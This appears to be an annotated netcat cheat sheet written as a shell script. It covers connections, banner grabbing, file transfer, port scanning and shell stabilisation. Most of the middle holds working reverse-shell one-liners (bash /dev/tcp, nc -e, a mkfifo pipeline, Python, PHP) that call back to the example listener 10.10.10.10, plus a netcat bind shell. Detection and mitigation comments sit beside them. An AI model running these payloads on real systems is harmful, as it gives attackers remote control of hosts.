# Connect to host (client)
# Opens a plain TCP connection to port 80 on 192.168.1.1 (example address).
# Netcat adds no encryption or authentication to the stream.
nc 192.168.1.1 80
# Listen on port (server)
# The listener takes a connection from any peer that can reach port 4444;
# nothing here restricts who may connect, so keep the port firewalled to the
# expected peer while it is open.
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS (numeric addresses only, no name lookups)
# -p port (local port number)
# NOTE(review): option handling differs between netcat implementations
# (traditional, OpenBSD, ncat) — confirm against the local man page.
# Banner grabbing
# Sends a single empty line to port 22 and prints whatever the service sends
# back; -w1 gives up after a 1-second timeout.
# Defender view: the banner is what any unauthenticated client can read, and it
# typically names the software and version, so it is worth checking what your
# own services disclose. The connection itself is visible in the service's and
# the firewall's logs.
echo "" | nc -w1 192.168.1.1 22
# Receiver (start first)
# Writes whatever the first peer to connect sends into received_file.txt.
# The transfer has no authentication, encryption or integrity check: compare a
# checksum (e.g. sha256sum) over a separate channel, or use an SSH-based copy
# (scp, rsync over ssh) when the network is not trusted.
nc -lvnp 4444 > received_file.txt
# Sender
nc 192.168.1.1 4444 < file_to_send.txt
# Directory transfer
# As with the single file, the receiver (listener) has to be running before the
# sender. The receiver extracts whatever archive arrives into its current
# directory, so run it from an empty directory and only on a port the intended
# sender alone can reach.
# NOTE(review): GNU tar strips the leading "/" from member names by default, so
# the tree is recreated relative to the receiver's working directory — confirm
# for the tar in use.
tar czf - /path/to/dir | nc 192.168.1.1 4444 # sender
nc -lvnp 4444 | tar xzf - # receiver
# Reverse shell: the "victim" host connects OUT to the listener, so inbound
# firewall rules on the victim do not block it. 10.10.10.10:4444 is an example
# listener address. The session is cleartext TCP.
#
# Detection (applies to every variant below):
#   - an interactive /bin/bash whose stdin/stdout/stderr are a network socket
#     rather than a terminal;
#   - command lines containing "/dev/tcp/", "nc -e", or an interpreter
#     one-liner (python3 -c / php -r) that opens a socket and starts a shell;
#   - a shell spawned by a web server, database or other service account;
#   - process-execution logging (auditd execve rules, EDR) captures these
#     command lines; flow logs show the outbound connection.
# Mitigation: default-deny egress from servers, and remove netcat builds that
# support -e from hosts that do not need them.
#
# Listener (attacker machine)
nc -lvnp 4444
# Victim — Bash
# Uses bash's /dev/tcp pseudo-path; all three standard streams point at the socket.
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
# Victim — Netcat (traditional)
# -e makes nc run /bin/bash attached to the connection.
nc -e /bin/bash 10.10.10.10 4444
# Victim — Netcat (OpenBSD, no -e)
# Host artifact: a named pipe at the fixed path /tmp/f stays on disk after the
# session, and the mkfifo + shell + nc pipeline is visible in the process list.
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.10.10 4444 > /tmp/f
# Victim — Python
# Duplicates the socket onto descriptors 0, 1 and 2, then starts /bin/bash -i.
python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("10.10.10.10",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/bash","-i"])'
# Victim — PHP
php -r '$sock=fsockopen("10.10.10.10",4444); exec("/bin/bash -i <&3 >&3 2>&3");'
# Bind shell: here the "victim" listens and the other side connects IN.
# The listener hands /bin/bash to whoever connects to port 4444 first — there
# is no authentication and the session is cleartext.
# Detection/mitigation: an unexpected listening socket owned by nc (visible
# with `ss -tlnp`), a shell whose parent is nc, and a default-deny inbound
# firewall policy that keeps ad-hoc ports unreachable.
# Victim (waits for connection)
nc -lvnp 4444 -e /bin/bash
# Attacker (connects to victim)
nc 192.168.1.1 4444
# Scan TCP ports
# -z only tests whether a connection can be made and sends no data. The
# verbose result lines go to stderr, hence the 2>&1 before grep.
# NOTE(review): "succeeded" is the wording OpenBSD netcat prints; other
# implementations word an open port differently, so this grep can come back
# empty even when ports are open — confirm against the installed nc.
# Defender view: a sequential sweep of 1000 ports from one source address is
# easy to spot in firewall and IDS logs.
nc -zv 192.168.1.1 1-1000 2>&1 | grep succeeded
# Scan UDP
# -u switches to UDP. UDP has no handshake, so results are less reliable than
# for TCP: a port that simply does not answer can be reported as open.
nc -zvu 192.168.1.1 1-1000
# Single port check
nc -zv 192.168.1.1 22
# After catching reverse shell
# Run inside the caught shell: starts /bin/bash under a pseudo-terminal so that
# programs which require a TTY will work.
# Defender view: python3 spawning /bin/bash through pty under a service account
# is a useful process-tree indicator.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background
# Run in the LOCAL terminal: switches it to raw mode with echo off, then brings
# the backgrounded nc job back to the foreground.
# The local terminal stays in raw mode once the session ends; `reset` or
# `stty sane` restores it.
stty raw -echo; fg
# Press Enter twice
# Back inside the remote shell: set a terminal type for full-screen programs.
export TERM=xterm